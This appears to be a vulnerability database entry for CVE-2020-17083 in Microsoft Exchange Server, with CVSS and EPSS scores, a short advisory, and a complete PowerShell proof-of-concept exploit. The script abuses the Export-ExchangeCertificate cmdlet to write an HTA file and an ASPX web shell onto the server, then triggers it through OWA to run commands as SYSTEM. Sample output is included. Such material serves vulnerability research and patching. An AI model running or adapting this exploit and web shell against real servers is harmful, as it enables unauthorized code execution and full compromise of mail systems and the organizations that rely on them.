3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
0.013 Low
EPSS
Percentile
86.0%
Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication with the “Exchange Server Certificates” role is required to exploit this vulnerability.
The specific flaw exists within the WriteCertiricate function during the processing of the Export-ExchangeCertificate cmdlet. The issue results from the lack of proper validation of user-supplied data when writing files. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
Affected Vendors:
Microsoft
Affected Products:
Exchange Server
Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083>
# Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability
# Patch: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083
# CVSS v3: 9.1 (/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)
#
# Notes:
#
# The (ab)user needs the "Exchange Server Certificates" role assigned
# [PS] C:\Windows\system32>New-RoleGroup -Name "cert users" -Roles "Exchange Server Certificates" -Members "harryh"
#
# Name AssignedRoles RoleAssignments ManagedBy
# ---- ------------- --------------- ---------
# cert users {Exchange Server Certificates} {Exchange Server Certificates-cert users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}
#
#
# [PS] C:\Windows\system32>Get-RoleGroup "cert users" | Format-List
#
#
# RunspaceId : a97d7e2c-d036-4bfc-b95c-4fabcb644160
# ManagedBy : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}
# RoleAssignments : {Exchange Server Certificates-cert users}
# Roles : {Exchange Server Certificates}
# DisplayName :
# ExternalDirectoryObjectId :
# Members : {exchangedemo.com/Users/Harry Houdini}
# SamAccountName : cert users
# Description :
# RoleGroupType : Standard
# LinkedGroup :
# Capabilities : {}
# LinkedPartnerGroupId :
# LinkedPartnerOrganizationId :
# Identity : exchangedemo.com/Microsoft Exchange Security Groups/cert users
# IsValid : True
# ExchangeVersion : 0.10 (14.0.100.0)
# Name : cert users
# DistinguishedName : CN=cert users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid : 6fb0b860-2cc2-4fe1-9489-d93dbbed8c9f
# ObjectCategory : exchangedemo.com/Configuration/Schema/Group
# ObjectClass : {top, group}
# WhenChanged : 6/12/2020 4:15:54 AM
# WhenCreated : 6/12/2020 1:34:51 AM
# WhenChangedUTC : 6/11/2020 8:15:54 PM
# WhenCreatedUTC : 6/11/2020 5:34:51 PM
# OrganizationId :
# Id : exchangedemo.com/Microsoft Exchange Security Groups/cert users
# OriginatingServer : DEAD01.exchangedemo.com
# ObjectState : Changed
#
# Example:
#
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr [email protected] -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with [email protected]:user123###
# (+) wrote to target file C:/Windows/Temp/rXq1U2tD.hta
# (+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/4VFQwc7W.aspx
# (+) shell written, executing command...
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>
param (
[Parameter(Mandatory=$true)][string]$server,
[Parameter(Mandatory=$true)][string]$usr,
[Parameter(Mandatory=$true)][string]$pwd,
[string]$cmd = "mspaint"
)
Function Get-RandomAlphanumericString {
[CmdletBinding()]
Param (
[int] $length = 8
)
Process{
Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length | % {[char]$_}) )
}
}
function Writebad-File{
Param (
[string] $fn,
[string] $content,
[System.Management.Automation.Runspaces.PSSession] $session
)
$selector = Get-RandomAlphanumericString
Invoke-Command -Session $session -ScriptBlock {
New-ExchangeCertificate -BinaryEncoded -GenerateRequest -SubjectName "c=$Using:selector,o=$Using:content,cn=si"
} | Out-Null
$thumb = Invoke-Command -Session $session -ScriptBlock {
Get-ExchangeCertificate
} | Where-Object -Property Subject -like "*c=$selector*" | select-object -Expand Thumbprint
# this is where the file write is for this bug
Invoke-Command -Session $session -ScriptBlock {
Export-ExchangeCertificate -Thumbprint $Using:thumb -FileName $Using:fn -BinaryEncoded;
} | Out-Null
}
function Exploit-Exchange {
Param (
[string] $server,
[string] $usr,
[string] $pwd,
[string] $cmd
)
"(+) targeting $server with ${usr}:$pwd"
$securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
$s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds
$hta = Get-RandomAlphanumericString
$aspx = Get-RandomAlphanumericString
# write a hta file with commands
Writebad-File -fn "C:/Windows/Temp/$hta.hta" -content "" -session $s
"(+) wrote to target file C:/Windows/Temp/$hta.hta"
# write aspx file
Writebad-File -fn "C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx" -content "<%=System.Diagnostics.Process.Start(Request[Request.HttpMethod])%>" -session $s
"(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx"
"(+) shell written, executing command..."
$b = @{
destination = "https://$server/ecp/$aspx.aspx?GET=C:/Windows/Temp/$hta.hta"
flags = ''
username = $usr
password = $pwd
}
$r = Invoke-WebRequest "https://$server/owa/auth.owa" -SessionVariable 'websess' -Body $b -Method 'POST' | Select-Object -Expand Forms
if ([string]::IsNullOrWhiteSpace($r)) {
"(+) executed $cmd as SYSTEM!"
} else {
"(-) exploit failed"
}
}
Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd
3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
0.013 Low
EPSS
Percentile
86.0%